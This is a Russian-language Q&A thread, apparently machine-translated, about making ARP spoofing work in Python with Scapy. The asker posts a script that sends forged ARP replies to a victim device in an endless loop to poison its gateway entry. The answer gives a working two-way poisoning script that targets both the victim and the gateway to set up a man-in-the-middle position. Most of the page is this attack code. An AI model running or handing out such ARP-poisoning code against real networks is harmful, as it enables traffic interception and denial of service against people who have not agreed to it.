Арп Спуфинг / Отравление не работает / перестал работать - PullRequest
1 голос
/ 17 апреля 2020

В последнее время я пытался создать «Человек посередине», используя Python и Scapy (для моей собственной практики, без вредоносных целей). Я начал с написания кода для создания DOS, но по какой-то причине он ведет себя странно. Прежде всего, по какой-то причине, когда я запускаю его на моем Windows P C, запись arp никогда не меняется. Я даже дошел до очистки таблицы arp (arp -d *), но реальный адрес ma c шлюза все же возвращается. Во-вторых, код работает на моем телефоне только частично - при открытии веб-сайтов это занимает много времени. Также некоторые сайты кажутся незатронутыми (Instagram работает ...). Кроме того, выполнение кода на телефонах разных марок привело к разным результатам.

Может ли быть, что на разных устройствах существуют меры безопасности? Я сделал что-то неправильно? Вот код, спасибо за помощь!

from enum import Enum

import getmac
import netifaces
from scapy.all import ARP, Ether, sendp


class DeviceIps(Enum):
    MyPhone = '192.168.1.27'
    MyPc = '192.168.1.70'


class Device(object):
    def __init__(self, ip: str):
        self.ip = ip


def get_mac_from_ip(ip=None):
    return getmac.get_mac_address(ip=ip)


def build_poison_packet(victim_ip):
    ARP_RESPONSE_CODE = 0x2
    FAKE_MAC_ADDRESS = 'aa:bb:cc:dd:ee:ff'

    gateway_ip_address = netifaces.gateways()['default'][netifaces.AF_INET][0]
    victim_mac_address = get_mac_from_ip(victim_ip)
    poison_packet = Ether(src=FAKE_MAC_ADDRESS, dst=victim_mac_address) \
                    / ARP(psrc=gateway_ip_address,  # -> Address to lie about
                          hwsrc=FAKE_MAC_ADDRESS,  # -> Mac address to direct to
                          hwdst=victim_mac_address, pdst=victim_ip, op=ARP_RESPONSE_CODE)
    return poison_packet


def poison(target: Device):
    poison_packet = build_poison_packet(target.ip)
    print(poison_packet.show())
    while True:
        sendp(poison_packet)


def main():
    poison(Device(DeviceIps.MyPc.value))

main()

1 Ответ

0 голосов
/ 29 апреля 2020

Вот простой код scapy, который отправляет arp-ответ на адрес жертвы и хоста (шлюза). Вы можете очистить таблицу arp жертвы и хоста до того, как ваш скрипт завершится.

#!/bin/env python

from scapy.all import Ether, ARP, sendp
import time

victim_hw_addr = "34:e1:2d:83:20:aa"
victim_ip_addr = "192.168.43.152"
gw_hw_addr = "ce:9f:7a:7b:d7:aa"
gw_ip_addr = "192.168.43.1"
my_hw_addr = "8c:85:90:c3:0b:aa"
tmout = 100

arp4victim = Ether(dst=victim_hw_addr, src=my_hw_addr) / ARP(pdst=victim_ip_addr, hwdst=victim_hw_addr, psrc=gw_ip_addr, hwsrc=my_hw_addr, op=2)
arp4gw = Ether(dst=gw_hw_addr, src=my_hw_addr) / ARP(pdst=gw_ip_addr, hwdst=gw_hw_addr, psrc=victim_ip_addr, hwsrc=my_hw_addr, op=2)

while True:
    sendp(arp4victim)
    sendp(arp4gw)
    time.sleep(3)
    print "*"
...